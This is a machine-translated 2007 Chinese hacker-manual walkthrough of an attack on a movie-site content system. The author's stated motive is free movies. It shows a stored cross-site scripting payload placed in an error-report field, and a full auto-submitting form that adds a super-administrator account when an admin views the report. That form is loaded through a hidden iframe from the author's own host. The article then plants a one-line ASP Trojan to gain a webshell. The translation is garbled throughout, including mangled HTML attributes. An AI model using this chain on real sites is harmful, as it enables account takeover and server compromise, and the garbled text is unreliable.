Cross out privileges—century hotline whole Station program perfect version of the exploit-vulnerability warning-the black bar safety net

2007-08-23T00:00:00
ID MYHACK58:62200716639
Type myhack58
Reporter 佚名
Modified 2007-08-23T00:00:00

Description

Note:this article starting in the hacker manual,. Reprint please indicate the source

Cross-site although not a new technology. But in foreign countries is also very seriously. In fact, cross-site code if the structure is good, then you can do a lot of things. Not, in online shopping to a movie website. Thought if put this station down to do not you can watch free movies. (Motivation is not very good.^_^)。 Find the program used is:"the century hotline whole Station program perfect version"then go to the Baidu search also is not made with drain Hole. Then your back to slowly study it.

Can say that this is a set of routines in the injection aspect of prevention is also good. However, the cross-site aspect as if it did not do the home. After careful search, finally I found a little soft threat. First of all, we first register User. General movie website provides movie error page. This is no exception. We at home just click on a movie. Below there is a report of the error. Tap will open a page. Because of this reporting error only administrators can see, we in reports an error. write"<script>alert("cherry find vulnerability")</script>", as shown in Figure 1.

!

The point of the start of the report, we then go to the background of a movie management/bug reports to look at, the cross-site code is successfully executed. As shown in Figure 2.

!

Since this can be performed, we in to construct some special code. The background has an added administrator, we first look at it's code is how to achieve, to add the admin key code is as follows:

|

<form method="post" action="saveuser1. asp" name="form1" > <table width="3 9 6" border="0" cellspacing="1" cellpadding="0"> <tr bgcolor="#0099FF"> <td height="2 5" width="3 9 2"> <div align="center"> <font size="2">add admin</font></div> </td> </tr> <tr> <td height="3 0" style="color: black; border-style: none" width="2 5 3"> <div align="center"> <font size="2">username <input type="text" name="username" size="2 0"> </font> </div> </td> <td height="3 0" style="color: black; border-style: none" width="1 3 8"> </td> </tr> <tr> <td height="3 0" style="color: black; border-style: none" width="2 5 3"> <div align="center"> <font size="2">password <input type="password" name="newpin" size="2 0"> </font> </div> </td> <td height="3 0" style="color: black; border-style: none" width="1 3 8"> <span lang="zh-cn"><font size="2">digital+letters 1 0 The above</font></span></td> </tr> <tr> <td height="3 0" style="color: black; border-style: none" width="2 5 3"> <div align="center"> <font size="2">Confirm password <input type="password" name="re_newpin" size="2 0"> </font> </div> </td> <td height="3 0" style="color: black; border-style: none" width="1 3 8"> <span lang="zh-cn"><font size="2">digital+letters 1 0 The above</font></span></td> </tr> <tr> <td height="3 0" style="color: black; border-style: none" width="2 5 3"> <p align="center"><span lang="zh-cn"> </span>set permissions <span lang="zh-cn"> </span><select size="1" name="flag"> <option selected value="4">==== no Management Permissions====</option> <option value="3">==== the primary administrator====</option> <option value="2">==== senior administrator====</option> <option value="1">==== the super administrator====</option> </select></td> <td height="3 0" style="color: black; border-style: none" width="1 3 8"> </td> </tr> </table> <p><input type="submit" name="Submit" value="OK"> </p> </form>

Actually this we only slightly change what you can, change the code as follows:

<form method="post" action="http://127.0.0.1/admin/saveuser1.asp"> <table width="3 9 6" border="0" cellspacing="1" cellpadding="0"> <tr bgcolor="#0099FF"> <td height="2 5" width="3 9 2"> <div align="center"> <font size="2">add admin</font></div> </td> </tr> <tr> <td height="3 0" style="color: black; border-style: none" width="2 5 3"> <div align="center"> <font size="2">username <input type="text" name="username" size="2 0" value="hacklu119"> ’add the Administrator's name </font> </div> </td> <td height="3 0" style="color: black; border-style: none" width="1 3 8"> </td> </tr> <tr> <td height="3 0" style="color: black; border-style: none" width="2 5 3"> <div align="center"> <font size="2">password <input type="password" name="newpin" size="2 0" value="hack11911"> ’add the administrator password </font> </div> </td> <td height="3 0" style="color: black; border-style: none" width="1 3 8"> <span lang="zh-cn"><font size="2">digital+letters 1 0 The above</font></span></td> </tr> <tr> <td height="3 0" style="color: black; border-style: none" width="2 5 3"> <div align="center"> <font size="2">Confirm password <input type="password" name="re_newpin" size="2 0" value="hack11911"> ’confirm administrator password </font> </div> </td> <td height="3 0" style="color: black; border-style: none" width="1 3 8"> <span lang="zh-cn"><font size="2">digital+letters 1 0 The above</font></span></td> </tr> <tr> <td height="3 0" style="color: black; border-style: none" width="2 5 3"> <p align="center"><span lang="zh-cn"> </span>set permissions <span lang="zh-cn"> </span><select size="1" name="flag"> <option selected value="1">==== no Management Permissions====</option> ’is set as the super Administrator,the note here is 1 <option value="3">==== the primary administrator====</option> <option value="2">==== senior administrator====</option> <option value="1">==== the super administrator====</option> </select></td> <td height="3 0" style="color: black; border-style: none" width="1 3 8"> </td> </tr> </table> <p><input type="submit" name="Submit" value="OK"> </p>

<p> </p> <p align="center"> <script language="javascript"> ’with javascript script called program to run automatically this. document. forms[0]. submit() </script> </div> </form>


The most important thing is the action after the path and the final automatic run of the script, the path we must pair. The above code is hacklu. htm to upload to your own space. And then came the error Report the place to write on we hung it to the code: <iframe src=http://www.hacklu.net/tu/hacklu.htm width=0 height=0></iframe>, www.hacklu.net是我空 Between the the address. Such Administrator at the wrong error reporting when you add a name: hacklu119 the super administrator. As shown in Figure 3, Figure 4 shown.

!

!

In fact, we can also construct a backup WEBSHELL or anything, just the background without the BACKUP DATABASE function. So get WEBSHELL there are certain difficulties. I started in the Add movie to Top upload ASP Trojan. Another is to catch the name and it is to change the extension, but unfortunately also without success. Later inadvertently found out that this database is ASP, then it is good to do. Only in add movie places Write on our word ASP Trojans, as shown in Figure 5.

!

Finally add about our client connection http://127.0.0.1/data/jdzcn.asp as shown in Figure 6, After a successful connection will generate killbase. the asp file. The last successful get WEBSHELL on. See Figure 7.

!

But if the database changed the name, then give the WEBSHELL is not easy. Finally everyone is welcome to NOHACK/BBS and I exchange. My ID is Sakura prodigal son.